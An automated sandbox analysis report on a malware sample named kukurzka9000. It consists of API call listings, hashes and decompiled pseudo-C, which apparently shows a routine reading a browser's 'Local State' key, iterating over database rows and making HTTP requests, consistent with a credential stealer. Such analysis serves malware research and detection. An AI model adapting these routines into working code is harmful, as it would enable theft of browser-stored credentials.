                                                                                                                                                                        • Associated: 00000010.00000002.331335251.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_400000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseFreeHandleInternetLocal$ByteCharMultiWide$HttpRequestSend
                                                                                                                                                                        • String ID: /$mozzzzzzzzzzz$pXet
                                                                                                                                                                        • API String ID: 2620049550-238817591
                                                                                                                                                                        • Opcode ID: 6c2859dcb35dbed66665eb2f5d4fab0f439358c126c8472905a5f17b3495ad7a
                                                                                                                                                                        • Instruction ID: 677f3e060cdc4141eea8ad2591dda170fc442a0e6149e7f0a8c7285b1f3b2b30
                                                                                                                                                                        • Opcode Fuzzy Hash: 6c2859dcb35dbed66665eb2f5d4fab0f439358c126c8472905a5f17b3495ad7a
                                                                                                                                                                        • Instruction Fuzzy Hash: 0F71BF71A00215BFEB149BA5CD45F7B77B8EB48700F04847AFA14FB2D0D6B4AD508BA9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2390000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocal$CloseFind
                                                                                                                                                                        • String ID: .$pXet
                                                                                                                                                                        • API String ID: 3269183270-4267161970
                                                                                                                                                                        • Opcode ID: eeb62ecb9f106cfc2f54af98f71ca67650812a65c88e6959245ad390bece3727
                                                                                                                                                                        • Instruction ID: 596190e438729d56401d4f01491f8339812601560ce08a5d6bc48d0bf8f0030e
                                                                                                                                                                        • Opcode Fuzzy Hash: eeb62ecb9f106cfc2f54af98f71ca67650812a65c88e6959245ad390bece3727
                                                                                                                                                                        • Instruction Fuzzy Hash: 40818DB1604301AFEB04DF65DD44F2B77E9EB89314F00492CF655A72A0DBB4E911CBAA
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 02399C12: LocalFree.KERNEL32(00000000,?,?,02391F22), ref: 02399C75
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02396114
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 02396223
                                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,02395DDF), ref: 0239625D
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,02395DDF), ref: 02396268
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,02395DDF), ref: 02396273
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,02395DDF), ref: 0239627F
                                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,02395DDF), ref: 02396286
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,02395DDF), ref: 0239628D
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2390000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocal$DeleteFile
                                                                                                                                                                        • String ID: FALSE$TRUE$pXet
                                                                                                                                                                        • API String ID: 2194112602-183093725
                                                                                                                                                                        • Opcode ID: 4de672f5ef5204324d375e2cd98ccb70593393dc9187e84e2e65f519924a5a45
                                                                                                                                                                        • Instruction ID: 8ad2dc6e230facefb4f699d12aff8cf8a222d81a3f0f7ff84861caa3a99bc27e
                                                                                                                                                                        • Opcode Fuzzy Hash: 4de672f5ef5204324d375e2cd98ccb70593393dc9187e84e2e65f519924a5a45
                                                                                                                                                                        • Instruction Fuzzy Hash: 38619331A00214EFDF189FA6EE85EAD7BB9EF48310F104428F915B72A1DB749920CF58
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 18%
                                                                                                                                                                        			E00401C87(WCHAR* __ecx, WCHAR* __edx, intOrPtr* _a4, intOrPtr* _a8, intOrPtr* _a12, void* _a16) {
                                                                                                                                                                        				WCHAR* _v8;
                                                                                                                                                                        				WCHAR* _v12;
                                                                                                                                                                        				void* _v16;
                                                                                                                                                                        				char _v20;
                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                        				void* _t35;
                                                                                                                                                                        				void* _t56;
                                                                                                                                                                        				void* _t66;
                                                                                                                                                                        				char _t73;
                                                                                                                                                                        				void* _t74;
                                                                                                                                                                        				WCHAR* _t77;
                                                                                                                                                                        				void* _t78;
                                                                                                                                                                        				intOrPtr _t81;
                                                                                                                                                                        				WCHAR* _t93;
                                                                                                                                                                        				void* _t96;
                                                                                                                                                                        				intOrPtr* _t98;
                                                                                                                                                                        				void* _t99;
                                                                                                                                                                        				intOrPtr _t100;
                                                                                                                                                                        				intOrPtr* _t101;
                                                                                                                                                                        				intOrPtr _t102;
                                                                                                                                                                        				intOrPtr* _t103;
                                                                                                                                                                        
                                                                                                                                                                        				_v12 = __edx;
                                                                                                                                                                        				_t73 = 0;
                                                                                                                                                                        				_v8 = __ecx;
                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                        				_t35 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        				_t96 = _t35;
                                                                                                                                                                        				_v16 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        				if(_a16 != 0) {
                                                                                                                                                                        					_push(__ecx);
                                                                                                                                                                        				} else {
                                                                                                                                                                        					PathCombineW(_t96, __ecx, _v12);
                                                                                                                                                                        					_push(_t96);
                                                                                                                                                                        				}
                                                                                                                                                                        				_t98 = _a4;
                                                                                                                                                                        				 *_t98 =  *((intOrPtr*)( *0x40e13c))( *_t98);
                                                                                                                                                                        				_t99 = _v16;
                                                                                                                                                                        				PathCombineW(_t99, _v8, L"Local State");
                                                                                                                                                                        				_t77 =  *((intOrPtr*)( *0x40e03c))(_t99, 0x80000000, 1, _t73, 3, _t73, _t73);
                                                                                                                                                                        				_v12 = _t77;
                                                                                                                                                                        				_t78 =  *((intOrPtr*)( *0x40e14c))(_t77, _t73);
                                                                                                                                                                        				_a16 = _t78;
                                                                                                                                                                        				_t93 =  *((intOrPtr*)( *0x40e044))(0x40, _t78);
                                                                                                                                                                        				_push(_t73);
                                                                                                                                                                        				_v8 = _t93;
                                                                                                                                                                        				_push( &_v20);
                                                                                                                                                                        				_push(_a16 - 1);
                                                                                                                                                                        				_push(_t93);
                                                                                                                                                                        				_push(_v12);
                                                                                                                                                                        				if( *((intOrPtr*)( *0x40e088))() != 0) {
                                                                                                                                                                        					_t81 = _a16 + _a16;
                                                                                                                                                                        					_v24 = _t81;
                                                                                                                                                                        					_t56 =  *((intOrPtr*)( *0x40e044))(0x40, _t81);
                                                                                                                                                                        					_t100 =  *0x40e1f4; // 0x64bdc0
                                                                                                                                                                        					_a16 = _t56;
                                                                                                                                                                        					E0040A16F(E0040A4C2(_v8), _t100,  &_a16,  &_a16);
                                                                                                                                                                        					_push(_a16);
                                                                                                                                                                        					if( *((intOrPtr*)( *0x40e08c))() > 0) {
                                                                                                                                                                        						_t101 = _a8;
                                                                                                                                                                        						 *_t101 =  *((intOrPtr*)( *0x40e13c))( *_t101, _a16);
                                                                                                                                                                        						LocalFree(_a16);
                                                                                                                                                                        						_t66 =  *((intOrPtr*)( *0x40e044))(0x40, _v24);
                                                                                                                                                                        						_t102 =  *0x40e200; // 0x65adc0
                                                                                                                                                                        						_a16 = _t66;
                                                                                                                                                                        						E0040A16F(E0040A4C2(_v8), _t102,  &_a16,  &_a16);
                                                                                                                                                                        						_t74 = _a16;
                                                                                                                                                                        						if(_t74 != 0) {
                                                                                                                                                                        							_t103 = _a12;
                                                                                                                                                                        							 *_t103 =  *((intOrPtr*)( *0x40e13c))( *_t103, _t74);
                                                                                                                                                                        							LocalFree(_t74);
                                                                                                                                                                        						}
                                                                                                                                                                        						_t73 = 1;
                                                                                                                                                                        					}
                                                                                                                                                                        					CloseHandle(_v12);
                                                                                                                                                                        					_t99 = _v16;
                                                                                                                                                                        				}
                                                                                                                                                                        				LocalFree(_t99);
                                                                                                                                                                        				LocalFree(_t96);
                                                                                                                                                                        				LocalFree(_v8);
                                                                                                                                                                        				return _t73;
                                                                                                                                                                        			}
























                                                                                                                                                                        0x00401c9c
                                                                                                                                                                        0x00401c9f
                                                                                                                                                                        0x00401ca1
                                                                                                                                                                        0x00401ca6
                                                                                                                                                                        0x00401ca9
                                                                                                                                                                        0x00401cb0
                                                                                                                                                                        0x00401cbb
                                                                                                                                                                        0x00401cc1
                                                                                                                                                                        0x00401cd1
                                                                                                                                                                        0x00401cc3
                                                                                                                                                                        0x00401cc8
                                                                                                                                                                        0x00401cce
                                                                                                                                                                        0x00401cce
                                                                                                                                                                        0x00401cd2
                                                                                                                                                                        0x00401ce6
                                                                                                                                                                        0x00401ce8
                                                                                                                                                                        0x00401cec
                                                                                                                                                                        0x00401d06
                                                                                                                                                                        0x00401d0f
                                                                                                                                                                        0x00401d14
                                                                                                                                                                        0x00401d1e
                                                                                                                                                                        0x00401d29
                                                                                                                                                                        0x00401d2b
                                                                                                                                                                        0x00401d2f
                                                                                                                                                                        0x00401d32
                                                                                                                                                                        0x00401d37
                                                                                                                                                                        0x00401d38
                                                                                                                                                                        0x00401d39
                                                                                                                                                                        0x00401d40
                                                                                                                                                                        0x00401d4e
                                                                                                                                                                        0x00401d53
                                                                                                                                                                        0x00401d56
                                                                                                                                                                        0x00401d5b
                                                                                                                                                                        0x00401d61
                                                                                                                                                                        0x00401d72
                                                                                                                                                                        0x00401d7e
                                                                                                                                                                        0x00401d85
                                                                                                                                                                        0x00401d87
                                                                                                                                                                        0x00401d99
                                                                                                                                                                        0x00401d9b
                                                                                                                                                                        0x00401dab
                                                                                                                                                                        0x00401db0
                                                                                                                                                                        0x00401db6
                                                                                                                                                                        0x00401dc7
                                                                                                                                                                        0x00401dcc
                                                                                                                                                                        0x00401dd3
                                                                                                                                                                        0x00401dd5
                                                                                                                                                                        0x00401de3
                                                                                                                                                                        0x00401de5
                                                                                                                                                                        0x00401de5
                                                                                                                                                                        0x00401ded
                                                                                                                                                                        0x00401ded
                                                                                                                                                                        0x00401df1
                                                                                                                                                                        0x00401df7
                                                                                                                                                                        0x00401df7
                                                                                                                                                                        0x00401dfb
                                                                                                                                                                        0x00401e02
                                                                                                                                                                        0x00401e0b
                                                                                                                                                                        0x00401e17

                                                                                                                                                                        APIs
                                                                                                                                                                        • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00401CC8
                                                                                                                                                                        • PathCombineW.SHLWAPI(?,?,Local State), ref: 00401CEC
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00401D9B
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00401DE5
                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00401DF1
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00401DFB
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00401E02
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00401E0B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000010.00000002.331335251.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_400000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocal$CombinePath$CloseHandle
                                                                                                                                                                        • String ID: Local State$pXet
                                                                                                                                                                        • API String ID: 2998194811-709686943
                                                                                                                                                                        • Opcode ID: b89154720f445bf51b2e96a239cc4b3d4fa919ccbd2c9594b8aa0e9c2ba5a7c7
                                                                                                                                                                        • Instruction ID: e8ea5197d75d1b9ffa148ce1658a92dc358bcbabd267189588b6ee53365c4b7a
                                                                                                                                                                        • Opcode Fuzzy Hash: b89154720f445bf51b2e96a239cc4b3d4fa919ccbd2c9594b8aa0e9c2ba5a7c7
                                                                                                                                                                        • Instruction Fuzzy Hash: B95141B5600215EFEB04DFA5DE85AAE7BB9EF48300F104829F915F7250D774AD20CB69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrcpyn.KERNEL32(00000000,00409A74,00000000,?,?,?,?,?,?,?,?,?,00409A74,00000000,00000000,00000000), ref: 0040933B
                                                                                                                                                                        • lstrcpyn.KERNEL32(00000010,00409A74,00000000,?,?,?,?,?,?,?,?,?,00409A74,00000000,00000000,00000000), ref: 0040937B
                                                                                                                                                                        • lstrcpyn.KERNEL32(00000020,00409A74,00000000,?,?,?,?,?,?,?,?,?,00409A74,00000000,00000000,00000000), ref: 004093BB
                                                                                                                                                                        • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,00409A74,00000000,00000000,00000000,00000000,00000000), ref: 004093C5
                                                                                                                                                                          • Part of subcall function 0040A4C2: LocalAlloc.KERNEL32(00000040,?,?,?,00000000,00407793), ref: 0040A4E1
                                                                                                                                                                          • Part of subcall function 0040A4C2: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,afb5c633c4650f69312baef49db9dfa4,000000FF,00000000,00000000,?,?,?,00000000,00407793), ref: 0040A4F1
                                                                                                                                                                        • wsprintfW.USER32 ref: 004093E3
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
                                                                                                                                                                          • Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00409A74,00000000), ref: 004093FB
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00409A74,00000000), ref: 00409402
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00409A74,00000000,00000000,00000000,00000000,00000000), ref: 00409411
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00409A74,00000000,00000000,00000000,00000000,00000000), ref: 0040941B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000010.00000002.331335251.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_400000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocal$lstrcpyn$lstrlen$AllocByteCharGlobalInfoMultiSystemWidewsprintf
                                                                                                                                                                        • String ID: pXet
                                                                                                                                                                        • API String ID: 850942500-1731603023
                                                                                                                                                                        • Opcode ID: b4d1448f4ce841ff52ca8b65c126921d7f37aa71f907b12cfa87153c2d27789a
                                                                                                                                                                        • Instruction ID: bf3e6bb46204bb3e37d09e038ca25be6bf8868f14e997d98ff16e67e74bb5e03
                                                                                                                                                                        • Opcode Fuzzy Hash: b4d1448f4ce841ff52ca8b65c126921d7f37aa71f907b12cfa87153c2d27789a
                                                                                                                                                                        • Instruction Fuzzy Hash: 0D4192B1A002149FDB04CF69DDC496ABBF8EB48320B14857AFE09FB355D6749D50CBA8
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2390000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: pXet
                                                                                                                                                                        • API String ID: 0-1731603023
                                                                                                                                                                        • Opcode ID: d851c9bc5cda07b011c471ba514d21b876054248c69a850a91c851fea1f9c6b3
                                                                                                                                                                        • Instruction ID: 5533565eeb95be69a4d69bccc5af8c1fad30d6c02eafcaa4b6012745572330e2
                                                                                                                                                                        • Opcode Fuzzy Hash: d851c9bc5cda07b011c471ba514d21b876054248c69a850a91c851fea1f9c6b3
                                                                                                                                                                        • Instruction Fuzzy Hash: D181B272900219BFDF00DFA6DD44EAE7BBAEB86310F004925FA15F7290DB749A11CB65
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • PathCombineW.SHLWAPI(00000000,00000000,00000000,?,00000000,00000000), ref: 0239123C
                                                                                                                                                                        • PathCombineW.SHLWAPI(?,00000000,0040C79C,?,00000000,00000000), ref: 02391260
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,00000000,00000000), ref: 0239130F
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,00000000,00000000), ref: 02391359
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000000), ref: 02391365
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,00000000,00000000), ref: 0239136F
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,00000000,00000000), ref: 02391376
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,00000000,00000000), ref: 0239137F
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2390000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocal$CombinePath$CloseHandle
                                                                                                                                                                        • String ID: pXet
                                                                                                                                                                        • API String ID: 2998194811-1731603023
                                                                                                                                                                        • Opcode ID: 7829dc6c71f128cacdf391500ca352a992bf4a38fd881ec11def570a6cd4989f
                                                                                                                                                                        • Instruction ID: 5b2afc44a95f0c4611f5a054192e0f9c9ae01935c7506186120e0e9b13d147c7
                                                                                                                                                                        • Opcode Fuzzy Hash: 7829dc6c71f128cacdf391500ca352a992bf4a38fd881ec11def570a6cd4989f
                                                                                                                                                                        • Instruction Fuzzy Hash: C2515EB5A00215EFEF14DFA5DE85AAE7BB9EB48310F004828F954F3250D770AD20CB65
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrlenW.KERNEL32(006584F8,?,?,?,?,?,?,?,?,?,?,?,004058D7,?,?,?), ref: 00406137
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?,?,?,004058D7,?,?), ref: 0040615C
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,004058D7,?,?,?), ref: 00406221
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
                                                                                                                                                                          • Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004058D7,?,?,?), ref: 0040622B
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,004058D7,?,?,?,00000000,00000000,00000000), ref: 00406270
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,004058D7,?,?,?,00000000,00000000,00000000), ref: 004062C7
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,004058D7,?,?,?,00000000,00000000,00000000), ref: 004062CE
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,004058D7,?,?,?,00000000,00000000,00000000), ref: 00406325
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,004058D7,?,?,?,00000000,00000000,00000000), ref: 0040632F
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000010.00000002.331335251.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_400000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocal$lstrlen$AllocGlobal
                                                                                                                                                                        • String ID: pXet
                                                                                                                                                                        • API String ID: 3339188435-1731603023
                                                                                                                                                                        • Opcode ID: 319254aba6765eaa7791b5b77958f6401530b4e901e8356fdf1d01df47330636
                                                                                                                                                                        • Instruction ID: ff6bad65333e8fe1a3c55b3bcf1dec483b74064a970dacde523e554a8e1a11d4
                                                                                                                                                                        • Opcode Fuzzy Hash: 319254aba6765eaa7791b5b77958f6401530b4e901e8356fdf1d01df47330636
                                                                                                                                                                        • Instruction Fuzzy Hash: 78A1A872504301ABDB14DF65DD8096BBBF5FF88300F01492DFA59A72A0D775E820CBAA
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 023973AD
                                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 023973B9
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 023973C0
                                                                                                                                                                        • LocalFree.KERNEL32(0000002F), ref: 0239742E
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 02397437
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0239743E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2390000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseFreeHandleInternetLocal
                                                                                                                                                                        • String ID: /$pXet
                                                                                                                                                                        • API String ID: 3319388337-889940695
                                                                                                                                                                        • Opcode ID: 1b3c63f6ad7b7c56e05ea6f413d6885c404e8ecc1f31910e50c1ca249fd4186c
                                                                                                                                                                        • Instruction ID: fbfb786ad93ddfee3480d12df38bb31e8594a2de0b257f3984b3e43b0b6c1564
                                                                                                                                                                        • Opcode Fuzzy Hash: 1b3c63f6ad7b7c56e05ea6f413d6885c404e8ecc1f31910e50c1ca249fd4186c
                                                                                                                                                                        • Instruction Fuzzy Hash: 9371D1B1A10215BFEB149BA5CD45F7EBBB8EB49700F048429FA14FB2D0D7B0AD508B65
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 19%
                                                                                                                                                                        			E00407213(intOrPtr* __ecx, intOrPtr _a4, void* _a8) {
                                                                                                                                                                        				char _v8;
                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                        				void* _t24;
                                                                                                                                                                        				void* _t25;
                                                                                                                                                                        				void* _t27;
                                                                                                                                                                        				intOrPtr* _t32;
                                                                                                                                                                        				intOrPtr* _t39;
                                                                                                                                                                        				void* _t40;
                                                                                                                                                                        				intOrPtr* _t41;
                                                                                                                                                                        				intOrPtr* _t43;
                                                                                                                                                                        				intOrPtr _t44;
                                                                                                                                                                        				intOrPtr _t45;
                                                                                                                                                                        				intOrPtr _t47;
                                                                                                                                                                        				intOrPtr _t48;
                                                                                                                                                                        				intOrPtr _t51;
                                                                                                                                                                        				intOrPtr _t52;
                                                                                                                                                                        				intOrPtr* _t59;
                                                                                                                                                                        				intOrPtr* _t69;
                                                                                                                                                                        				intOrPtr _t82;
                                                                                                                                                                        				intOrPtr _t84;
                                                                                                                                                                        				intOrPtr _t85;
                                                                                                                                                                        				void* _t87;
                                                                                                                                                                        				void* _t89;
                                                                                                                                                                        				void* _t90;
                                                                                                                                                                        				void* _t91;
                                                                                                                                                                        
                                                                                                                                                                        				_t59 = __ecx;
                                                                                                                                                                        				if(_a8 == 0) {
                                                                                                                                                                        					L18:
                                                                                                                                                                        					return 0;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t24 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        				_t25 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        				_a8 = _t25;
                                                                                                                                                                        				_t87 =  *((intOrPtr*)( *0x40e000))(_t24, _a4,  *0x40e284);
                                                                                                                                                                        				_t27 = E0040A69E( *0x40e000,  &_a8);
                                                                                                                                                                        				_t89 = _a8;
                                                                                                                                                                        				if(_t27 == 0) {
                                                                                                                                                                        					L16:
                                                                                                                                                                        					LocalFree(_t87);
                                                                                                                                                                        					L17:
                                                                                                                                                                        					DeleteFileW(_t89);
                                                                                                                                                                        					LocalFree(_t89);
                                                                                                                                                                        					goto L18;
                                                                                                                                                                        				}
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_push(_t89);
                                                                                                                                                                        				_push(_t87);
                                                                                                                                                                        				if( *((intOrPtr*)( *0x40e184))() == 0) {
                                                                                                                                                                        					goto L16;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t32 =  *0x40e488; // 0x0
                                                                                                                                                                        				_push( &_v8);
                                                                                                                                                                        				_push(_t89);
                                                                                                                                                                        				if( *_t32() != 0) {
                                                                                                                                                                        					L11:
                                                                                                                                                                        					DeleteFileW(_t89);
                                                                                                                                                                        					if(_t89 != 0) {
                                                                                                                                                                        						LocalFree(_t89);
                                                                                                                                                                        					}
                                                                                                                                                                        					if(_t87 != 0) {
                                                                                                                                                                        						LocalFree(_t87);
                                                                                                                                                                        					}
                                                                                                                                                                        					return 1;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t39 =  *0x40e494; // 0x0
                                                                                                                                                                        				_t40 =  *_t39(_v8,  *0x40e238, 0xffffffff,  &_a8, 0);
                                                                                                                                                                        				_t91 = _t90 + 0x14;
                                                                                                                                                                        				if(_t40 == 0) {
                                                                                                                                                                        					while(1) {
                                                                                                                                                                        						_push(_a8);
                                                                                                                                                                        						_t41 =  *0x40e48c; // 0x0
                                                                                                                                                                        						if( *_t41() != 0x64) {
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t43 =  *0x40e4b4; // 0x0
                                                                                                                                                                        						_t44 =  *_t43(_a8, 0);
                                                                                                                                                                        						_t69 =  *0x40e4b4; // 0x0
                                                                                                                                                                        						_v12 = _t44;
                                                                                                                                                                        						_t45 =  *_t69(_a8, 1);
                                                                                                                                                                        						_t91 = _t91 + 0x10;
                                                                                                                                                                        						_v16 = _t45;
                                                                                                                                                                        						_push(_v12);
                                                                                                                                                                        						if( *((intOrPtr*)( *0x40e08c))() > 1) {
                                                                                                                                                                        							_t47 = E0040A503( *_t59, _v12);
                                                                                                                                                                        							_t82 =  *0x40e228; // 0x658858
                                                                                                                                                                        							 *_t59 = _t47;
                                                                                                                                                                        							_t48 = E0040A503(_t47, _t82);
                                                                                                                                                                        							_push(_v16);
                                                                                                                                                                        							 *_t59 = _t48;
                                                                                                                                                                        							if( *((intOrPtr*)( *0x40e08c))() > 1) {
                                                                                                                                                                        								_t51 = E0040A503( *_t59, _v16);
                                                                                                                                                                        								_t84 =  *0x40e228; // 0x658858
                                                                                                                                                                        								 *_t59 = _t51;
                                                                                                                                                                        								_t52 = E0040A503(_t51, _t84);
                                                                                                                                                                        								_t85 =  *0x40e228; // 0x658858
                                                                                                                                                                        								 *_t59 = _t52;
                                                                                                                                                                        								 *_t59 = E0040A503(_t52, _t85);
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        					 *0x40e4b0(_a8);
